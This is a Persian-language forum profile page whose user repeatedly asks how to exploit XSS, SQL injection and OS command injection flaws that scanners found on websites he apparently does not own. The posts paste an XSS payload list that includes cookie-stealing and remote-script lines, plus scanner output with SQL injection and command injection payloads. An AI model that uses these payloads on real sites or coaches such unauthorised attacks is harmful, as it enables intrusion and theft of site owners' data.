discord icon
سرور دیسکورد گاردایران

payam99

کاربر تازه وارد
  • تعداد ارسال ها

    15
  • تاریخ عضویت

  • آخرین بازدید

درباره payam99

  • درجه
    1
  • تاریخ تولد تعیین نشده

آخرین بازدید کنندگان نمایه

بلوک آخرین بازدید کننده ها غیر فعال شده است و به دیگر کاربران نشان داده نمیشود.

  1. سلام من میخوام عضو شبکه ایران گارد در دیسکورد بشم و آدرس https://discord.gg/vVxerJg زدم اما کار نمیکنه! میگه "INVITE LINK - The invite is invalid or has expired" تشکر.
  2. تشکر از شما. هیچکدوم از مواردی که شما گفتید نیست. میتونم اسم سایتو به صورت خصوصی براتون بفرستم؟
  3. سلام تشکر از شما. من ویدئوی آموزشی شمارو دیدم. مشکل اینجاست که وب سایت مورد نظر من اصلا در URL چیزی به اسم id نداره!!! چی کار باید بکنم؟
  4. ممنونم. میشه یه مثال در مورد Sqlmap و آدرس زیر بگید؟ http://mywebsite.com/wp-content/uploads/2020/06/8b92f1ba14987755-720p.mp4?_=1 اگه شما بخواهید آدرس بالا را با برنامه Sqlmap بررسی کنید چه مراحلی را انجام میدید؟
  5. خیلی از شما ممنون هستم. پس با این نوع حمله نمیشه روی سرور به طور مستقیم دسترسی روت پیدا کرد؟ فقط برای دزدیدن کوکی ادمین و بعد دسترسی روی سرور کاربرد داره؟
  6. ممنون از راهنمایی شما. تو اون صفحه جایی برای کامنت وجود نداره!
  7. تشکر. یعنی از طریق URL این امکان وجود نداره؟
  8. ممنون از شما. من با دیسکورد آشنایی ندارم. چه جوری استفاده کنم؟ میشه اینجا راهنمایی کنید؟
  9. سلام، من یک وب سایتو برای آسیب پذیری اسکن کردم و برنامه گفت که آسیب پذیری از نوع XSS وجود داره: XSS vulnerability in https://Example.com/ via injection in the parameter year Evil request: GET /?s=&year=%3C%2Ftitle%3E%3CScRiPt%3Ealert%28%2Fwexc9j1ufu%2F%29%3C%2FsCrIpT%3E&monthnum=&day=&cat=44&tag=%25d9%2588%25d8%25b1%25d8%25b2%25d8%25b4&tag=135 HTTP/1.1 وقتی آدرس بالا را در مرورگر می نویسم فقط یک پیام به صورت زیر با یک دکمه OK نشون داده میشه: example.com says /wexc9j1ufu/ تو اینترنت سرچ کردم دیدم این حمله از نوع XSS مثال زیادی مثل زیر داره: <a onclick="alert(omurugur);">/ "><img src=x onerror=prompt(/omur/)> ");</script><script>alert(1)</script>" "><aUdIo SrC=x OnErRoR=alert(71465)>');" "><svg/onload;=alert(1)> ?templid=1%27%22%3E%3Cscript%3Ealert%28%27XSS%20@%20%27%2bdocument.domain%29%3C%2fscript%3E <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041> <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> <IMG SRC="jav ascript:alert('XSS');"> <IMG SRC="jav&#x09;ascript:alert('XSS');"> <IMG SRC="jav&#x0A;ascript:alert('XSS');"> <IMG SRC="jav&#x0D;ascript:alert('XSS');"> perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out <IMG SRC=" &#14; javascript:alert('XSS');"> <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> <SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT> ?attribute='</script><body onload&value=alert(document.cookie) ?value=A%27)%3b}%3balert(document.cookie)%3bif(0){var+html%3dwindow.opener.document.querySelector(%27[%3d" ?value=%22a%27);//%3C/script%3E%3Cbody%20onload=alert(document.cookie)%3E \uFF1C%\uFE64input/autofocus onfocus\b='[1].find(alert)' "><img src=x onerror=alert(document.domain)> چه جوری میتونم از مثال های بالا برای هدف استفاده کنم؟ تشکر از شما.
  10. سلام خیلی از شما ممنونم. ببخشید منظور از مراحل sql injection چیه؟ میشه چند تا مثال بگید؟
  11. سلام، من یک وب سایت را برای آسیب پذیری اسکن کردم و برنامه یکسری آسیب پذیری با عنوان "Advanced SQL Injection - AND boolean-based blind - WHERE or HAVING clause" پیدا کرد: URL http://mywebsite.com/wp-content/uploads/2020/06/8b92f1ba14987755-720p.mp4?_=1%27%29+AND+3109%3D9934+AND+%28%27CUYs%27%3D%27CUYs Method GET Parameter _ Attack 1') AND 3944=3944 AND ('GJLN'='GJLN *********** URL http://mywebsite.com/wp-content/uploads/2020/06/8b92f1ba14987755-720p.mp4?_=1 Method GET Parameter _ Attack field: [_], value [; select "java.lang.Thread.sleep"(15000) from INFORMATION_SCHEMA.SYSTEM_COLUMNS where TABLE_NAME = 'SYSTEM_COLUMNS' and COLUMN_NAME = 'TABLE_NAME' -- ] *********** URL http://mywebsite.com/wp-content/uploads/2020/06/8b92f1ba14987755-720p.mp4?_=1 Method GET Parameter _ Attack 1 and 0 in (select sleep(15) ) -- *********** URL http://mywebsite.com/wp-content/uploads/2020/06/8b92f1ba14987755-720p.mp4?_=1 Method GET Parameter _ Attack field: [_], value [(SELECT UTL_INADDR.get_host_name('10.0.0.1') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.2') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.4') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.5') from dual)] من وقتی آدرس بالا را در مرورگر می نویسم فقط یک ویدئو که در سایت وجود داره پخش میشه! چه جوری میتونم از این آسیب پذیری استقاده کنم؟ با تشکر.
  12. تشکر از شما. یک پیام برای شما فرستادم.
  13. سلام به همگی من یک وب سایتو با چند تا ابزار مختلف امنیتی چک کردم و میخوام بدونم که آیا مشکل خاصی داره که بشه بهش نفوذ کرد اما در این زمینه تخصص کافی ندارم و از بقیه اعضا که در این زمینه تخصص دارند درخواست راهنمایی دارم. نمیتونم اسم وب سایتو به صورت عمومی اینجا منتشر کنم و اگه کسی تمایل به راهنمایی داره ممنون میشم که جواب بده. با تشکر.
  14. من سرچ کردم اما چون مبتدی هستم چیز زیادی دستگیرم نشد. خود شما به عنوان یک هکر چه جوری از این آسیب پذیری ها استفاده می کنید؟
  15. سلام به همگی، من یه وب سایتو اسکن کردن و دو تا آسیب پذیری زیر برنامه پیدا کرد. من مبتدی هستم و میخوام بدونم چه جوری میتونم از این آسیب پذیری ها استفاده کنم: Cross Site Scripting (Reflected) http://mytarget.net/?cat=116&day=-1014&monthnum=1&s=ZAP&tag=%25d9%2585%25db%258c%25d9%2588%25d9%2587&year=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript% Attack: "><script>alert(1);</script> Remote OS Command Injection http://mytarget.net/wp-content/uploads/2020/06/a14987755.mp4?_=1%22%3Bsleep+15%3B%22 Attack: 1";sleep 15;" من اسم سایتو عوض کردم. ممنون میشم کسی بهم آموزش بده. تشکر.